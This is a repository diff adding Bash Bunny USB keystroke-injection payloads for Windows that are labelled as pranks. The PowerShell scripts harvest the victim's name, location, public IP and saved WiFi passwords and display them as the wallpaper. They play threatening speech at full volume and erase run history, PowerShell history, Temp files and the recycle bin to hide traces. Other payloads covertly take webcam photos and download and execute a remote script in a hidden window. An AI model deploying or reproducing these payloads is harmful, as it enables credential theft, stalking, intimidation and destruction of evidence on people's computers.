## Description
This program enumerates a target PC to get their Name, GeoLocation (Latitude and Longitude), Public IP, Day password was last set, and wifi passwords
This information will be saved to a file that is then converted to a .BMP image
That image will be saved to their desktop and saved as their wallpaper
Opening the image on their desktop with NotePad will reveal the binary code with a hidden message at the bottom of the file
![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/BashBunny/Payloads/BB-Wallpaper-Troll/wp-troll.jpg)
## Getting Started
### Dependencies
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* A one liner command in the run box will execute the script on the bash bunny
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div><h2>I am Jakoby</h2></div>
<p><br/>
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
<a href="https://github.com/I-Am-Jakoby/">
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
</a>
<a href="https://www.instagram.com/i_am_jakoby/">
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
</a>
<a href="https://twitter.com/I_Am_Jakoby/">
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
</a>
<a href="https://www.youtube.com/c/IamJakoby/">
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
</a>
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/BashBunny/Payloads/BB-Wallpaper-Troll)
</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
<p align="right">(<a href="#top">back to top</a>)</p>

412
payloads/library/prank/-BB-Wallpaper-Troll/Wallpaper-Troll.ps1 Normal file
View File

@ -0,0 +1,412 @@
############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : Wallpaper-Troll | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
# Category : Prank | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
# Target : Windows 10,11 | |___/ # /\/|_ __/\\ #
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################
<#
.DESCRIPTION
This program gathers details from target PC to include name associated with the microsoft account, their latitude and longitude,
Public IP, and and the SSID and WiFi password of any current or previously connected to networks.
It will take the gathered information and generate a .jpg with that information on show
Finally that .jpg will be applied as their Desktop Wallpaper so they know they were owned
Additionally a secret message will be left in the binary of the wallpaper image generated and left on their desktop
#>
#############################################################################################################################################
# this is the message that will be coded into the image you use as the wallpaper
$hiddenMessage = "`n`nMy crime is that of curiosity `nand yea curiosity killed the cat `nbut satisfaction brought him back `n with love -Jakoby"
# this will be the name of the image you use as the wallpaper
$ImageName = "dont-be-suspicious"
#############################################################################################################################################
<#
.NOTES
This will get the name associated with the microsoft account
#>
function Get-Name {
try {
$fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name")
}
# If no name is detected function will return $null to avoid sapi speak
# Write Error is just for troubleshooting
catch {Write-Error "No name was detected"
return $env:UserName
-ErrorAction SilentlyContinue
}
return $fullName
}
$fn = Get-Name
echo "Hey" $fn >> $Env:temp\foo.txt
echo "`nYour computer is not very secure" >> $Env:temp\foo.txt
#############################################################################################################################################
<#
.NOTES
This is to get the current Latitide and Longitude of your target
#>
function Get-GeoLocation{
try {
Add-Type -AssemblyName System.Device #Required to access System.Device.Location namespace
$GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object
$GeoWatcher.Start() #Begin resolving current locaton
while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) {
Start-Sleep -Milliseconds 100 #Wait for discovery.
}
if ($GeoWatcher.Permission -eq 'Denied'){
Write-Error 'Access Denied for Location Information'
} else {
$GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevent results.
}
}
# Write Error is just for troubleshooting
catch {Write-Error "No coordinates found"
return "No Coordinates found"
-ErrorAction SilentlyContinue
}
}
$GL = Get-GeoLocation
if ($GL) { echo "`nYour Location: `n$GL" >> $Env:temp\foo.txt }
#############################################################################################################################################
<#
.NOTES
This will get the public IP from the target computer
#>
function Get-PubIP {
try {
$computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content
}
# If no Public IP is detected function will return $null to avoid sapi speak
# Write Error is just for troubleshooting
catch {Write-Error "No Public IP was detected"
return $null
-ErrorAction SilentlyContinue
}
return $computerPubIP
}
$PubIP = Get-PubIP
if ($PubIP) { echo "`nYour Public IP: $PubIP" >> $Env:temp\foo.txt }
###########################################################################################################
<#
.NOTES
Password last Set
This function will custom tailor a response based on how long it has been since they last changed their password
#>
function Get-Days_Set {
#-----VARIABLES-----#
# $pls (password last set) = the date/time their password was last changed
# $days = the number of days since their password was last changed
try {
$pls = net user $env:USERNAME | Select-String -Pattern "Password last" ; $pls = [string]$pls
$plsPOS = $pls.IndexOf("e")
$pls = $pls.Substring($plsPOS+2).Trim()
$pls = $pls -replace ".{3}$"
$time = ((get-date) - (get-date "$pls")) ; $time = [string]$time
$DateArray =$time.Split(".")
$days = [int]$DateArray[0]
return $pls
}
# If no password set date is detected funtion will return $null to cancel Sapi Speak
# Write Error is just for troubleshooting
catch {Write-Error "Day password set not found"
return $null
-ErrorAction SilentlyContinue
}
}
$pls = Get-Days_Set
if ($pls) { echo "`nPassword Last Set: $pls" >> $Env:temp\foo.txt }
###########################################################################################################
<#
.NOTES
All Wifi Networks and Passwords
This function will gather all current Networks and Passwords saved on the target computer
They will be save in the temp directory to a file named with "$env:USERNAME-$(get-date -f yyyy-MM-dd)_WiFi-PWD.txt"
#>
# Get Network Interfaces
$Network = Get-WmiObject Win32_NetworkAdapterConfiguration | where { $_.MACAddress -notlike $null } | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress
# Get Wifi SSIDs and Passwords
$WLANProfileNames =@()
#Get all the WLAN profile names
$Output = netsh.exe wlan show profiles | Select-String -pattern " : "
#Trim the output to receive only the name
Foreach($WLANProfileName in $Output){
$WLANProfileNames += (($WLANProfileName -split ":")[1]).Trim()
}
$WLANProfileObjects =@()
#Bind the WLAN profile names and also the password to a custom object
Foreach($WLANProfileName in $WLANProfileNames){
#get the output for the specified profile name and trim the output to receive the password if there is no password it will inform the user
try{
$WLANProfilePassword = (((netsh.exe wlan show profiles name="$WLANProfileName" key=clear | select-string -Pattern "Key Content") -split ":")[1]).Trim()
}Catch{
$WLANProfilePassword = "The password is not stored in this profile"
}
#Build the object and add this to an array
$WLANProfileObject = New-Object PSCustomobject
$WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfileName" -Value $WLANProfileName
$WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfilePassword" -Value $WLANProfilePassword
$WLANProfileObjects += $WLANProfileObject
Remove-Variable WLANProfileObject
}
if (!$WLANProfileObjects) { Write-Host "variable is null"
}else {
# This is the name of the file the networks and passwords are saved to and later uploaded to the DropBox Cloud Storage
echo "`nW-Lan profiles: ===============================" $WLANProfileObjects >> $Env:temp\foo.txt
$content = [IO.File]::ReadAllText("$Env:temp\foo.txt")
}
#############################################################################################################################################
<#
.NOTES
This will get the dimension of the targets screen to make the wallpaper
#>
Add-Type @"
using System;
using System.Runtime.InteropServices;
public class PInvoke {
[DllImport("user32.dll")] public static extern IntPtr GetDC(IntPtr hwnd);
[DllImport("gdi32.dll")] public static extern int GetDeviceCaps(IntPtr hdc, int nIndex);
}
"@
$hdc = [PInvoke]::GetDC([IntPtr]::Zero)
$w = [PInvoke]::GetDeviceCaps($hdc, 118) # width
$h = [PInvoke]::GetDeviceCaps($hdc, 117) # height
#############################################################################################################################################
<#
.NOTES
This will get take the information gathered and format it into a .jpg
#>
Add-Type -AssemblyName System.Drawing
$filename = "$env:tmp\foo.jpg"
$bmp = new-object System.Drawing.Bitmap $w,$h
$font = new-object System.Drawing.Font Consolas,18
$brushBg = [System.Drawing.Brushes]::White
$brushFg = [System.Drawing.Brushes]::Black
$graphics = [System.Drawing.Graphics]::FromImage($bmp)
$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height)
$graphics.DrawString($content,$font,$brushFg,500,100)
$graphics.Dispose()
$bmp.Save($filename)
# Invoke-Item $filename
#############################################################################################################################################
<#
.NOTES
This will take your hidden message and use steganography to hide it in the image you use as the wallpaper
Then it will clean up the files you don't want to leave behind
#>
echo $hiddenMessage > $Env:temp\foo.txt
cmd.exe /c copy /b "$Env:temp\foo.jpg" + "$Env:temp\foo.txt" "$Env:USERPROFILE\Desktop\$ImageName.jpg"
rm $env:TEMP\foo.txt,$env:TEMP\foo.jpg -r -Force -ErrorAction SilentlyContinue
#############################################################################################################################################
<#
.NOTES
This will take the image you generated and set it as the targets wall paper
#>
Function Set-WallPaper {
<#
.SYNOPSIS
Applies a specified wallpaper to the current user's desktop
.PARAMETER Image
Provide the exact path to the image
.PARAMETER Style
Provide wallpaper style (Example: Fill, Fit, Stretch, Tile, Center, or Span)
.EXAMPLE
Set-WallPaper -Image "C:\Wallpaper\Default.jpg"
Set-WallPaper -Image "C:\Wallpaper\Background.jpg" -Style Fit
#>
param (
[parameter(Mandatory=$True)]
# Provide path to image
[string]$Image,
# Provide wallpaper style that you would like applied
[parameter(Mandatory=$False)]
[ValidateSet('Fill', 'Fit', 'Stretch', 'Tile', 'Center', 'Span')]
[string]$Style
)
$WallpaperStyle = Switch ($Style) {
"Fill" {"10"}
"Fit" {"6"}
"Stretch" {"2"}
"Tile" {"0"}
"Center" {"0"}
"Span" {"22"}
}
If($Style -eq "Tile") {
New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force
New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 1 -Force
}
Else {
New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force
New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 0 -Force
}
Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
public class Params
{
[DllImport("User32.dll",CharSet=CharSet.Unicode)]
public static extern int SystemParametersInfo (Int32 uAction,
Int32 uParam,
String lpvParam,
Int32 fuWinIni);
}
"@
$SPI_SETDESKWALLPAPER = 0x0014
$UpdateIniFile = 0x01
$SendChangeEvent = 0x02
$fWinIni = $UpdateIniFile -bor $SendChangeEvent
$ret = [Params]::SystemParametersInfo($SPI_SETDESKWALLPAPER, 0, $Image, $fWinIni)
}
#----------------------------------------------------------------------------------------------------
function clean-exfil {
<#
.NOTES
This is to clean up behind you and remove any evidence to prove you were there
#>
# Delete contents of Temp folder
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
# Delete run box history
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
# Delete powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath
# Deletes contents of recycle bin
Clear-RecycleBin -Force -ErrorAction SilentlyContinue
}
#----------------------------------------------------------------------------------------------------
Set-WallPaper -Image "$Env:USERPROFILE\Desktop\$ImageName.jpg" -Style Center
clean-exfil

26
payloads/library/prank/-BB-Wallpaper-Troll/payload.txt Normal file
View File

@ -0,0 +1,26 @@
# Title: Wallpaper-Troll
# Description: This payload is meant to taunt your target with a revealing wallpaper. See README.md for more details
# Author: I am Jakoby
# Version: 1.0
# Category: Prank
# Attackmodes: HID, Storage
# Target: Windows 10, 11
# --------------------------------------------------------------------------------------
# THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
# --------------------------------------------------------------------------------------
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
LED STAGE1
QUACK DELAY 3000
QUACK GUI r
QUACK DELAY 100
LED STAGE2
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\WallPaper-Troll.ps1')"
QUACK ENTER

BIN
payloads/library/prank/-BB-Wallpaper-Troll/wp-troll.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 89 KiB

97
payloads/library/prank/-BB-We-Found-You/README.md Normal file
View File

@ -0,0 +1,97 @@
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# We-Found-You
This script is ready to run as is. Just download and execute with the provided link.
## Description
This script will get the GeoLocation (Latitude and Longitude) of your target.
Then a page will open in their browser with a map of their current location on it
Their system volume will be turned to max level
And sapi speak with talk through their speakers the message provided or a custom one you provide
![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/BashBunny/Payloads/BB-We-Found-You/location.jpg)
## Getting Started
### Dependencies
* Windows 10,11
* Their location services are turned on
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* A one liner command in the run box will execute the script on the bash bunny
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div><h2>I am Jakoby</h2></div>
<p><br/>
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
<a href="https://github.com/I-Am-Jakoby/">
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
</a>
<a href="https://www.instagram.com/i_am_jakoby/">
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
</a>
<a href="https://twitter.com/I_Am_Jakoby/">
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
</a>
<a href="https://www.youtube.com/c/IamJakoby/">
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
</a>
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/BashBunny/Payloads/BB-We-Found-You)
</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
<p align="right">(<a href="#top">back to top</a>)</p>

176
payloads/library/prank/-BB-We-Found-You/found-you.ps1 Normal file
View File

@ -0,0 +1,176 @@
############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : We-Found-You | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
# Category : Prank | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################
<#
.NOTES
The targets Location Services must be turned on or this payload will not work
.SYNOPSIS
This script will get the users location and open a map of where they are in their browser and use windows speech to declare you know where they are
.DESCRIPTION
This program gathers details from target PC to include Operating System, RAM Capacity, Public IP, and Email associated with microsoft account.
The SSID and WiFi password of any current or previously connected to networks.
It determines the last day they changed thier password and how many days ago.
Once the information is gathered the script will pause until a mouse movement is detected
Then the script uses Sapi speak to roast their set up and lack of security
#>
#-----------------------------------------------------------------------------------------------------------------------------------------------------------
<#
.NOTES
This is to get the Name associate with the targets microsoft account, if not detected UserName will be used
#>
function Get-fullName {
try {
$fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name")
}
# If no name is detected function will return $env:UserName
# Write Error is just for troubleshooting
catch {Write-Error "No name was detected"
return $env:UserName
-ErrorAction SilentlyContinue
}
return $fullName
}
$FN = Get-fullName
#-----------------------------------------------------------------------------------------------------------------------------------------------------------
<#
.NOTES
This is to get the current Latitide and Longitude of your target
#>
function Get-GeoLocation{
try {
Add-Type -AssemblyName System.Device #Required to access System.Device.Location namespace
$GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object
$GeoWatcher.Start() #Begin resolving current locaton
while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) {
Start-Sleep -Milliseconds 100 #Wait for discovery.
}
if ($GeoWatcher.Permission -eq 'Denied'){
Write-Error 'Access Denied for Location Information'
} else {
$GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevent results.
}
}
# Write Error is just for troubleshooting
catch {Write-Error "No coordinates found"
return "No Coordinates found"
-ErrorAction SilentlyContinue
}
}
#-----------------------------------------------------------------------------------------------------------------------------------------------------------
<#
.NOTES
This is to pause the script until a mouse movement is detected
#>
function Pause-Script{
Add-Type -AssemblyName System.Windows.Forms
$originalPOS = [System.Windows.Forms.Cursor]::Position.X
$o=New-Object -ComObject WScript.Shell
while (1) {
$pauseTime = 3
if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
break
}
else {
$o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
}
}
}
#-----------------------------------------------------------------------------------------------------------------------------------------------------------
$GL = Get-GeoLocation
$GL = $GL -split " "
$Lat = $GL[0].Substring(11) -replace ".$"
$Lon = $GL[1].Substring(10) -replace ".$"
Pause-Script
# Opens their browser with a map of their current location
Start-Process "https://www.latlong.net/c/?lat=$Lat&long=$Lon"
Start-Sleep -s 3
# Sets Volume to max level
$k=[Math]::Ceiling(100/2);$o=New-Object -ComObject WScript.Shell;for($i = 0;$i -lt $k;$i++){$o.SendKeys([char] 175)}
# Sets up speech module
$s=New-Object -ComObject SAPI.SpVoice
$s.Rate = -2
$s.Speak("We found you $FN")
$s.Speak("We know where you are")
$s.Speak("We are everywhere")
$s.Speak("Expect us")
#-----------------------------------------------------------------------------------------------------------------------------------------------------------
<#
.NOTES
This is to clean up behind you and remove any evidence to prove you were there
#>
# Delete contents of Temp folder
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
# Delete run box history
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
# Delete powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath
# Deletes contents of recycle bin
Clear-RecycleBin -Force -ErrorAction SilentlyContinue

BIN
payloads/library/prank/-BB-We-Found-You/location.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 114 KiB

26
payloads/library/prank/-BB-We-Found-You/payload.txt Normal file
View File

@ -0,0 +1,26 @@
# Title: We-Found-You
# Description: This payload is meant to open a map in your targets web browser with their current location
# Author: I am Jakoby
# Version: 1.0
# Category: Prank
# Attackmodes: HID, Storage
# Target: Windows 10, 11
# --------------------------------------------------------------------------------------
# THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
# --------------------------------------------------------------------------------------
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
LED STAGE1
QUACK DELAY 3000
QUACK GUI r
QUACK DELAY 100
LED STAGE2
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\found-you.ps1')"
QUACK ENTER

129
payloads/library/prank/ScreenSaver_FuNNN_b-b/payload.txt Normal file
View File

@ -0,0 +1,129 @@
# Title: Title: ScreenSaveR_FuNNN_b/b
# Author: LulzAnarchyANon
# Description: The webcam is opened,and 15 pictures are taken and saved to the camera roll folder.
# The wallpaper settings are then changed so the Photos/Camera Roll folder is used for the screensaver.
# The slide show delay is set to 1 minute, and the slide show speed set to FAST
# Target: Windows 10
# Props: Darren Kitchen and I am Jakoby
# Version: 1.0
# Category: Prank
LED B G 100
ATTACKMODE HID
QUACK GUI
QUACK DELAY 5
QUACK STRING camera
QUACK DELAY 50
QUACK ENTER
QUACK DELAY 1000
QUACK CONTROL SPACE
QUACK DELAY 200
QUACK CONTROL SPACE
QUACK DELAY 200
QUACK CONTROL SPACE
QUACK DELAY 200
QUACK CONTROL SPACE
QUACK DELAY 200
QUACK CONTROL SPACE
QUACK DELAY 200
QUACK CONTROL SPACE
QUACK DELAY 200
QUACK CONTROL SPACE
QUACK DELAY 200
QUACK CONTROL SPACE
QUACK DELAY 200
QUACK CONTROL SPACE
QUACK DELAY 200
QUACK CONTROL SPACE
QUACK DELAY 200
QUACK CONTROL SPACE
QUACK DELAY 200
QUACK CONTROL SPACE
QUACK DELAY 200
QUACK CONTROL SPACE
QUACK DELAY 200
QUACK CONTROL SPACE
QUACK DELAY 200
QUACK CONTROL SPACE
QUACK DELAY 1000
QUACK STRING camera
QUACK ALT F4
QUACK DELAY 2000
QUACK GUI r
QUACK DELAY 100
QUACK STRING control desk.cpl, ,@screensaver
QUACK ENTER
QUACK DELAY 200
QUACK STRING P
QUACK DELAY 200
QUACK TAB
QUACK DELAY 100
QUACK TAB
QUACK DELAY 20
QUACK TAB
QUACK DELAY 50
QUACK DOWNARROW
QUACK DELAY 50
QUACK DOWNARROW
QUACK DELAY 50
QUACK DOWNARROW
QUACK DELAY 50
QUACK DOWNARROW
QUACK DELAY 50
QUACK DOWNARROW
QUACK DELAY 50
QUACK DOWNARROW
QUACK DELAY 50
QUACK DOWNARROW
QUACK DELAY 50
QUACK DOWNARROW
QUACK DELAY 50
QUACK DOWNARROW
QUACK DELAY 50
QUACK DOWNARROW
QUACK DELAY 50
QUACK TAB
QUACK DELAY 50
QUACK TAB
QUACK DELAY 50
QUACK TAB
QUACK DELAY 50
QUACK TAB
QUACK DELAY 50
QUACK TAB
QUACK DELAY 50
QUACK TAB
QUACK DELAY 50
QUACK TAB
QUACK DELAY 50
QUACK TAB
QUACK DELAY 100
QUACK ENTER
QUACK DELAY 50
QUACK SPACE
QUACK DELAY 50
QUACK TAB
QUACK DELAY 50
QUACK TAB
QUACK DELAY 50
QUACK RIGHTARROW
QUACK DELAY 50
QUACK DOWNARROW
QUACK DELAY 50
QUACK DOWNARROW
QUACK DELAY 50
QUACK ENTER
QUACK TAB
QUACK DEALY 50
QUACK SHIFT F
QUACK DELAY 50
QUACK TAB
QUACK DELAY 50
QUACK TAB
QUACK DELAY 50
QUACK TAB
QUACK DELAY 50
QUACK SHIFT S
QUACK DELAY 50
QUACK ENTER
LED G 0

33
payloads/library/prank/Win_PoSH_MyPictures2AsciiArt/payload.txt Normal file
View File

@ -0,0 +1,33 @@
#!/bin/bash
# Title: My Pictures 2 Ascii Art
# Description: Converts Jpeg, Png & BMP's in the My Pictures to ascii art versions.
# Author: Cribbit
# Version: 1.0
# Category: General
# Target: Windows (Powershell 5.1+)
# Attackmodes: RNDIS_ETHERNET HID
LED SETUP
ATTACKMODE RNDIS_ETHERNET HID
GET SWITCH_POSITION
GET HOST_IP
cd /root/udisk/payloads/$SWITCH_POSITION/
# starting server
LED SPECIAL
# disallow outgoing dns requests so server starts immediately
iptables -A OUTPUT -p udp --dport 53 -j DROP
python -m SimpleHTTPServer 80 &
# wait until port is listening
while ! nc -z localhost 80; do sleep 0.2; done
# attack commences
LED ATTACK
QUACK DELAY 200
RUN WIN "powershell -Noni -NoP -W h -EP Bypass -C \"iex (New-Object Net.WebClient).DownloadString('http://$HOST_IP/s')\""
LED FINISH

23
payloads/library/prank/Win_PoSH_MyPictures2AsciiArt/readme.md Normal file
View File

@ -0,0 +1,23 @@
# My Pictures 2 Ascii Art
- Author: Cribbit
- Version: 1.0
- Tested on: Windows 10 (Powershell 5.1+)
- Category: General
- Attackmode: HID & RNDIS_ETHERNET
- Extensions: Run
- Props: Thinathayalan Ganesan & I am Jakoby
## Change Log
| Version | Changes |
| ------- | --------------- |
| 1.0 | Initial release |
## Description
Converts JPEG, PNG & BMP's in the My Pictures to ascii art versions.
## Colours
| Status | Colour | Description |
| -------- | ----------------------------- | --------------------------- |
| SETUP | Magenta solid | Setting attack mode |
| ATTACK | Yellow single blink | Injecting Powershell script |
| FINISHED | Green blink followed by SOLID | Injection finished |

76
payloads/library/prank/Win_PoSH_MyPictures2AsciiArt/s Normal file
View File

@ -0,0 +1,76 @@
[void] [System.Reflection.Assembly]::LoadWithPartialName("System.Drawing");
$AsciiChars = @( 'M', '#', '@', '%', 'X', '=', '+', '*', ';', ':', '-', '.', ' ' )
Function PS-AsciiArt
{
[CmdletBinding()]
param(
[String] [parameter(mandatory=$true, Valuefrompipeline = $true)] $Path, [Switch] $Reverse
)
process
{
foreach($item in $Path)
{
if ($Reverse -eq $true)
{
[array]::Reverse($AsciiChars)
}
$sb = [System.Text.StringBuilder]::new()
# Convert path to BitMap
$name = (Get-Item $Item).fullname;
$Bitmap = [System.Drawing.Bitmap]::FromFile($name)
# Resize Image
$Bitmap = (Get-ReSizedImage $BitMap 100)
# draw every other line
$draw = $true;
# loop down the image
foreach($y in (0..($BitMap.Height-1)))
{
if ($draw)
{
foreach($x in (0..($BitMap.Width-1)))
{
# get pixal
$Pixel = $Bitmap.GetPixel($X,$Y)
$Grey = ($Pixel.R + $Pixel.G + $Pixel.B) / 3;
$grayColor = [System.Drawing.Color]::FromArgb($Grey,$Grey,$Grey);
if (!$toggle)
{
$index = (($grayColor.R * ($AsciiChars.count-1)) / 255);
[void]$sb.Append($AsciiChars[$index]);
}
}
[void]$sb.AppendLine('') #Start the next row
}
# flip bool
$draw = !$draw;
}
$sb.ToString() | Out-File ([io.path]::ChangeExtension($name, "ascii.txt"))
}
}
}
Function Get-ReSizedImage
{
param(
[System.Drawing.Bitmap] [parameter(mandatory=$true, Valuefrompipeline = $true)] $Image, [int] [parameter(mandatory=$true)] $Width
)
Process
{
$asciiHeight=0;
#Calculate the new Height of the image from its width
$asciiHeight = [int][Math]::Ceiling([double]$Image.Height * $Width / $Image.Width);
#Create a new Bitmap and define its resolution
$result = New-Object System.Drawing.Bitmap($Width, $asciiHeight);
$g = [System.Drawing.Graphics]::FromImage([System.Drawing.Image]$result);
#The interpolation mode produces high quality images
$g.InterpolationMode = [System.Drawing.Drawing2D.InterpolationMode]::HighQualityBicubic;
$g.DrawImage($Image, 0, 0, $Width, $asciiHeight);
$g.Dispose();
return $result;
}
}
Get-ChildItem ([environment]::getfolderpath("MyPictures")) | ? {$_.extension -in ".jpg", ".jpeg", ".png", ".bmp"} |% {$_.FullName | PS-AsciiArt}

411
payloads/library/recon/-BB-ADV-Recon/ADV-Recon.ps1 Normal file
View File

@ -0,0 +1,411 @@
############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : ADV-Recon | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
# Category : Recon | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
# Target : Windows 10,11 | |___/ # /\/|_ __/\\ #
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
